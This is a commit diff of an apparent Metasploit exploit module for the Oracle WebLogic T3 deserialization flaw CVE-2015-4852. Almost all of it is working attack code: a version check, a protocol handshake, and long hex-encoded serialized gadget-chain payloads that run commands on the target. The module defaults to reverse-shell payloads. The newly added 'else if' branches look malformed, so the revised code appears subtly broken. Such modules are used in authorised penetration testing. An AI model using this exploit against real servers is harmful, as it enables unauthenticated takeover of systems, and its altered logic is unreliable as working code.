Some fixes to pass msftidy.
parent
446144ba8e
commit
82db6025c9
|
@ -6,289 +6,288 @@
|
||||||
require 'msf/core/exploit/powershell'
|
require 'msf/core/exploit/powershell'
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking
|
Rank = ManualRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::Tcp
|
include Msf::Exploit::Remote::Tcp
|
||||||
include Msf::Exploit::Powershell
|
include Msf::Exploit::Powershell
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'Oracle Weblogic Server Deserialization RCE - Raw Object',
|
'Name' => 'Oracle Weblogic Server Deserialization RCE - Raw Object',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
An unauthenticated attacker with network access to the Oracle Weblogic Server T3
|
An unauthenticated attacker with network access to the Oracle Weblogic Server T3
|
||||||
interface can send a serialized object (weblogic.jms.common.StreamMessageImpl)
|
interface can send a serialized object (weblogic.jms.common.StreamMessageImpl)
|
||||||
to the interface to execute code on vulnerable hosts.
|
to the interface to execute code on vulnerable hosts.
|
||||||
},
|
},
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'Andres Rodriguez <arodriguez[at]2secure.org>', # Metasploit Module - (@acamro, acamro[at]gmail.com)
|
'Andres Rodriguez <arodriguez[at]2secure.org>', # Metasploit Module - (@acamro, acamro[at]gmail.com)
|
||||||
'Stephen Breen', # Vulnerability Discovery
|
'Stephen Breen', # Vulnerability Discovery
|
||||||
'Jacob Robles' # Metasploit Module Template
|
'Jacob Robles' # Metasploit Module Template
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
['CVE', '2015-4852']
|
['CVE', '2015-4852']
|
||||||
],
|
],
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'Platform' => %w{ unix win solaris },
|
'Platform' => %w{ unix win solaris },
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'Unix',
|
[ 'Unix',
|
||||||
'Platform' => 'unix',
|
'Platform' => 'unix',
|
||||||
'Arch' => ARCH_CMD,
|
'Arch' => ARCH_CMD,
|
||||||
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},
|
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},
|
||||||
'Payload' => {
|
'Payload' => {
|
||||||
'Encoder' => 'cmd/ifs',
|
'Encoder' => 'cmd/ifs',
|
||||||
'BadChars' => ' ',
|
'BadChars' => ' ',
|
||||||
'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'}
|
'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'}
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
[ 'Windows',
|
[ 'Windows',
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Payload' => {},
|
'Payload' => {},
|
||||||
'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
|
'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
|
||||||
],
|
],
|
||||||
[ 'Solaris',
|
[ 'Solaris',
|
||||||
'Platform' => 'solaris',
|
'Platform' => 'solaris',
|
||||||
'Arch' => ARCH_CMD,
|
'Arch' => ARCH_CMD,
|
||||||
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
|
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
|
||||||
'Payload' => {
|
'Payload' => {
|
||||||
'Space' => 2048,
|
'Space' => 2048,
|
||||||
'DisableNops' => true,
|
'DisableNops' => true,
|
||||||
'Compat' =>
|
'Compat' =>
|
||||||
{
|
{
|
||||||
'PayloadType' => 'cmd',
|
'PayloadType' => 'cmd',
|
||||||
'RequiredCmd' => 'generic perl telnet',
|
'RequiredCmd' => 'generic perl telnet',
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
],
|
]
|
||||||
[ 'Java (Generic)',
|
],
|
||||||
'Platform' => 'java',
|
'DefaultTarget' => 0,
|
||||||
'Arch' => ARCH_JAVA
|
'DefaultOptions' =>
|
||||||
]
|
{
|
||||||
],
|
'RPORT' => 7001
|
||||||
'DefaultTarget' => 0,
|
},
|
||||||
'DefaultOptions' =>
|
'DisclosureDate' => 'Jan 28 2015'))
|
||||||
{
|
end
|
||||||
'RPORT' => 7001
|
|
||||||
},
|
|
||||||
'DisclosureDate' => 'Jan 28 2015'))
|
|
||||||
end
|
|
||||||
|
|
||||||
def check
|
def check
|
||||||
connect
|
connect
|
||||||
req = "GET /console/login/LoginForm.jsp HTTP/1.1\n"
|
req = "GET /console/login/LoginForm.jsp HTTP/1.1\n"
|
||||||
req << "Host: #{peer}\n\n"
|
req << "Host: #{peer}\n\n"
|
||||||
sock.put(req)
|
sock.put(req)
|
||||||
|
|
||||||
res = sock.get_once
|
res = sock.get_once
|
||||||
disconnect
|
disconnect
|
||||||
return CheckCode::Unknown unless res
|
return CheckCode::Unknown unless res
|
||||||
|
|
||||||
/WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.*\d*)/ =~ res
|
/WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.*\d*)/ =~ res
|
||||||
if version
|
if version
|
||||||
version = Gem::Version.new(version)
|
version = Gem::Version.new(version)
|
||||||
vprint_good("Detected Oracle WebLogic Server Version: #{version.to_s}")
|
vprint_good("Detected Oracle WebLogic Server Version: #{version.to_s}")
|
||||||
|
|
||||||
case
|
case
|
||||||
when version.to_s.start_with?('10.3')
|
when version.to_s.start_with?('10.3')
|
||||||
return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
|
return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
|
||||||
when version.to_s.start_with?('12.1.2')
|
when version.to_s.start_with?('12.1.2')
|
||||||
return CheckCode::Appears unless version > Gem::Version.new('12.1.2.0')
|
return CheckCode::Appears unless version > Gem::Version.new('12.1.2.0')
|
||||||
when version.to_s.start_with?('12.1.3')
|
when version.to_s.start_with?('12.1.3')
|
||||||
return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
|
return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
|
||||||
when version.to_s.start_with?('12.2')
|
when version.to_s.start_with?('12.2')
|
||||||
return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0')
|
return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0')
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
if res.include?('Oracle WebLogic Server Administration Console')
|
if res.include?('Oracle WebLogic Server Administration Console')
|
||||||
return CheckCode::Detected
|
return CheckCode::Detected
|
||||||
end
|
end
|
||||||
|
|
||||||
CheckCode::Unknown
|
CheckCode::Unknown
|
||||||
end
|
end
|
||||||
|
|
||||||
def t3_handshake
|
def t3_handshake
|
||||||
shake = '74332031322e322e310a41533a323535'
|
shake = '74332031322e322e310a41533a323535'
|
||||||
shake << '0a484c3a31390a4d533a313030303030'
|
shake << '0a484c3a31390a4d533a313030303030'
|
||||||
shake << '30300a0a'
|
shake << '30300a0a'
|
||||||
|
|
||||||
sock.put([shake].pack('H*'))
|
sock.put([shake].pack('H*'))
|
||||||
sleep(1)
|
sleep(1)
|
||||||
sock.get_once
|
sock.get_once
|
||||||
end
|
end
|
||||||
|
|
||||||
def build_t3_request_object
|
def build_t3_request_object
|
||||||
# T3 request serialized data
|
# T3 request serialized data
|
||||||
data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'
|
data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'
|
||||||
data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'
|
data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'
|
||||||
data << '700000000a000000030000000000000006007070707070700000000a00000003'
|
data << '700000000a000000030000000000000006007070707070700000000a00000003'
|
||||||
data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'
|
data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'
|
||||||
data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'
|
data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'
|
||||||
data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'
|
data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'
|
||||||
data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'
|
data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'
|
||||||
data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'
|
data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'
|
||||||
data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'
|
data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'
|
||||||
data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'
|
data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'
|
||||||
data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'
|
data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'
|
||||||
data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'
|
data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'
|
||||||
data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'
|
data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'
|
||||||
data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'
|
data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'
|
||||||
data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'
|
data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'
|
||||||
data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'
|
data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'
|
||||||
data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'
|
data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'
|
||||||
data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'
|
data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'
|
||||||
data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'
|
data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'
|
||||||
data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'
|
data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'
|
||||||
data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
|
data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
|
||||||
data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'
|
data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'
|
||||||
data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'
|
data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'
|
||||||
data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'
|
data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'
|
||||||
data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'
|
data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'
|
||||||
data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'
|
data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'
|
||||||
data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'
|
data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'
|
||||||
data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
|
data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
|
||||||
data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'
|
data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'
|
||||||
data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'
|
data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'
|
||||||
data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'
|
data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'
|
||||||
data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
|
data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
|
||||||
data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'
|
data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'
|
||||||
data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'
|
data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'
|
||||||
data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'
|
data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'
|
||||||
data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'
|
data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'
|
||||||
data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'
|
data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'
|
||||||
data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'
|
data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'
|
||||||
data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'
|
data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'
|
||||||
data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'
|
data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'
|
||||||
data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'
|
data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'
|
||||||
data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'
|
data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'
|
||||||
data << '2d4147444d565155423154362e656883348cd6000000070000'
|
data << '2d4147444d565155423154362e656883348cd6000000070000'
|
||||||
|
|
||||||
data << rport.to_s(16).rjust(4, '0')
|
data << rport.to_s(16).rjust(4, '0')
|
||||||
|
|
||||||
data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'
|
data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'
|
||||||
data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'
|
data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'
|
||||||
data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'
|
data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'
|
||||||
data << '863d1d0000000078'
|
data << '863d1d0000000078'
|
||||||
|
|
||||||
sock.put([data].pack('H*'))
|
sock.put([data].pack('H*'))
|
||||||
sleep(1)
|
sleep(1)
|
||||||
sock.get_once
|
sock.get_once
|
||||||
end
|
end
|
||||||
|
|
||||||
def send_payload_objdata
|
def send_payload_objdata
|
||||||
# payload creation
|
# payload creation
|
||||||
if target.name == 'Windows'
|
if target.name == 'Windows'
|
||||||
pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
|
pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
|
||||||
mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join
|
mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join
|
||||||
else
|
else if target.name == 'Unix'
|
||||||
nix_cmd = payload.encoded
|
nix_cmd = payload.encoded
|
||||||
nix_cmd.prepend('/bin/sh -c ')
|
nix_cmd.prepend('/bin/sh -c ')
|
||||||
mycmd = nix_cmd.each_byte.map {|b| b.to_s(16)}.join
|
mycmd = nix_cmd.each_byte.map {|b| b.to_s(16)}.join
|
||||||
end
|
else if target.name == 'Solaris'
|
||||||
|
sol_cmd = payload.encoded
|
||||||
serialized_cmd = (mycmd.length >> 1).to_s(16).rjust(4,'0')
|
mycmd = sol_cmd.each_byte.map {|b| b.to_s(16)}.join
|
||||||
serialized_cmd << mycmd
|
end
|
||||||
|
|
||||||
payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
|
|
||||||
payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
|
|
||||||
payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'
|
|
||||||
payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'
|
|
||||||
payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'
|
|
||||||
payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'
|
|
||||||
payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'
|
|
||||||
payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'
|
|
||||||
payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'
|
|
||||||
payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'
|
|
||||||
payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'
|
|
||||||
payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'
|
|
||||||
payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'
|
|
||||||
payload << '78707702000078fe010000'
|
|
||||||
|
|
||||||
# new payload
|
serialized_cmd = (mycmd.length >> 1).to_s(16).rjust(4,'0')
|
||||||
payload << 'aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e41'
|
serialized_cmd << mycmd
|
||||||
payload << '6e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb'
|
|
||||||
payload << '7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f757469'
|
|
||||||
payload << '6c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c617373'
|
|
||||||
payload << '3b7870737d00000001000d6a6176612e7574696c2e4d6170787200176a617661'
|
|
||||||
payload << '2e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c00'
|
|
||||||
payload << '01687400254c6a6176612f6c616e672f7265666c6563742f496e766f63617469'
|
|
||||||
payload << '6f6e48616e646c65723b78707371007e00007372002a6f72672e617061636865'
|
|
||||||
payload << '2e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d6170'
|
|
||||||
payload << '6ee594829e7910940300014c0007666163746f727974002c4c6f72672f617061'
|
|
||||||
payload << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'
|
|
||||||
payload << '6d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c'
|
|
||||||
payload << '6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f'
|
|
||||||
payload << '726d657230c797ec287a97040200015b000d695472616e73666f726d65727374'
|
|
||||||
payload << '002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f'
|
|
||||||
payload << '6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368'
|
|
||||||
payload << '652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65'
|
|
||||||
payload << '723bbd562af1d83418990200007870000000057372003b6f72672e6170616368'
|
|
||||||
payload << '652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e43'
|
|
||||||
payload << '6f6e7374616e745472616e73666f726d6572587690114102b1940200014c0009'
|
|
||||||
payload << '69436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870'
|
|
||||||
payload << '767200116a6176612e6c616e672e52756e74696d650000000000000000000000'
|
|
||||||
payload << '78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374'
|
|
||||||
payload << '696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d6572'
|
|
||||||
payload << '87e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e'
|
|
||||||
payload << '672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f'
|
|
||||||
payload << '6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a'
|
|
||||||
payload << '6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e67'
|
|
||||||
payload << '2e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452'
|
|
||||||
payload << '756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7ae'
|
|
||||||
payload << 'cbcd5a990200007870000000007400096765744d6574686f647571007e001e00'
|
|
||||||
payload << '000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202'
|
|
||||||
payload << '000078707671007e001e7371007e00167571007e001b00000002707571007e00'
|
|
||||||
payload << '1b00000000740006696e766f6b657571007e001e00000002767200106a617661'
|
|
||||||
payload << '2e6c616e672e4f626a656374000000000000000000000078707671007e001b73'
|
|
||||||
payload << '71007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7'
|
|
||||||
payload << 'e91d7b4702000078700000000174'
|
|
||||||
|
|
||||||
payload << serialized_cmd
|
|
||||||
|
|
||||||
payload << '740004657865637571007e001e0000000171007e00237371007e001173720011'
|
|
||||||
payload << '6a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576'
|
|
||||||
payload << '616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'
|
|
||||||
payload << '020000787000000001737200116a6176612e7574696c2e486173684d61700507'
|
|
||||||
payload << 'dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f'
|
|
||||||
payload << '6c6478703f40000000000000770800000010000000007878767200126a617661'
|
|
||||||
payload << '2e6c616e672e4f766572726964650000000000000000000000787071007e003a'
|
|
||||||
# serialized end
|
|
||||||
|
|
||||||
payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'
|
|
||||||
payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'
|
|
||||||
payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'
|
|
||||||
payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'
|
|
||||||
payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'
|
|
||||||
payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'
|
|
||||||
payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'
|
|
||||||
payload << '6f3b290000001b7878fe00ff'
|
|
||||||
|
|
||||||
data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')
|
payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
|
||||||
data << payload
|
payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
|
||||||
|
payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'
|
||||||
|
payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'
|
||||||
|
payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'
|
||||||
|
payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'
|
||||||
|
payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'
|
||||||
|
payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'
|
||||||
|
payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'
|
||||||
|
payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'
|
||||||
|
payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'
|
||||||
|
payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'
|
||||||
|
payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'
|
||||||
|
payload << '78707702000078fe010000'
|
||||||
|
|
||||||
sock.put([data].pack('H*'))
|
# new payload
|
||||||
sleep(1)
|
payload << 'aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e41'
|
||||||
sock.get_once
|
payload << '6e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb'
|
||||||
|
payload << '7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f757469'
|
||||||
end
|
payload << '6c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c617373'
|
||||||
|
payload << '3b7870737d00000001000d6a6176612e7574696c2e4d6170787200176a617661'
|
||||||
|
payload << '2e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c00'
|
||||||
|
payload << '01687400254c6a6176612f6c616e672f7265666c6563742f496e766f63617469'
|
||||||
|
payload << '6f6e48616e646c65723b78707371007e00007372002a6f72672e617061636865'
|
||||||
|
payload << '2e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d6170'
|
||||||
|
payload << '6ee594829e7910940300014c0007666163746f727974002c4c6f72672f617061'
|
||||||
|
payload << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'
|
||||||
|
payload << '6d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c'
|
||||||
|
payload << '6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f'
|
||||||
|
payload << '726d657230c797ec287a97040200015b000d695472616e73666f726d65727374'
|
||||||
|
payload << '002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f'
|
||||||
|
payload << '6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368'
|
||||||
|
payload << '652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65'
|
||||||
|
payload << '723bbd562af1d83418990200007870000000057372003b6f72672e6170616368'
|
||||||
|
payload << '652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e43'
|
||||||
|
payload << '6f6e7374616e745472616e73666f726d6572587690114102b1940200014c0009'
|
||||||
|
payload << '69436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870'
|
||||||
|
payload << '767200116a6176612e6c616e672e52756e74696d650000000000000000000000'
|
||||||
|
payload << '78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374'
|
||||||
|
payload << '696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d6572'
|
||||||
|
payload << '87e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e'
|
||||||
|
payload << '672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f'
|
||||||
|
payload << '6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a'
|
||||||
|
payload << '6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e67'
|
||||||
|
payload << '2e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452'
|
||||||
|
payload << '756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7ae'
|
||||||
|
payload << 'cbcd5a990200007870000000007400096765744d6574686f647571007e001e00'
|
||||||
|
payload << '000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202'
|
||||||
|
payload << '000078707671007e001e7371007e00167571007e001b00000002707571007e00'
|
||||||
|
payload << '1b00000000740006696e766f6b657571007e001e00000002767200106a617661'
|
||||||
|
payload << '2e6c616e672e4f626a656374000000000000000000000078707671007e001b73'
|
||||||
|
payload << '71007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7'
|
||||||
|
payload << 'e91d7b4702000078700000000174'
|
||||||
|
|
||||||
def exploit
|
payload << serialized_cmd
|
||||||
connect
|
|
||||||
|
|
||||||
print_status('Sending handshake...')
|
|
||||||
t3_handshake
|
|
||||||
|
|
||||||
print_status('Sending T3 request object...')
|
payload << '740004657865637571007e001e0000000171007e00237371007e001173720011'
|
||||||
build_t3_request_object
|
payload << '6a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576'
|
||||||
|
payload << '616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'
|
||||||
|
payload << '020000787000000001737200116a6176612e7574696c2e486173684d61700507'
|
||||||
|
payload << 'dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f'
|
||||||
|
payload << '6c6478703f40000000000000770800000010000000007878767200126a617661'
|
||||||
|
payload << '2e6c616e672e4f766572726964650000000000000000000000787071007e003a'
|
||||||
|
# serialized end
|
||||||
|
|
||||||
print_status('Sending client object payload...')
|
payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'
|
||||||
send_payload_objdata
|
payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'
|
||||||
|
payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'
|
||||||
|
payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'
|
||||||
|
payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'
|
||||||
|
payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'
|
||||||
|
payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'
|
||||||
|
payload << '6f3b290000001b7878fe00ff'
|
||||||
|
|
||||||
handler
|
data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')
|
||||||
disconnect
|
data << payload
|
||||||
end
|
|
||||||
|
sock.put([data].pack('H*'))
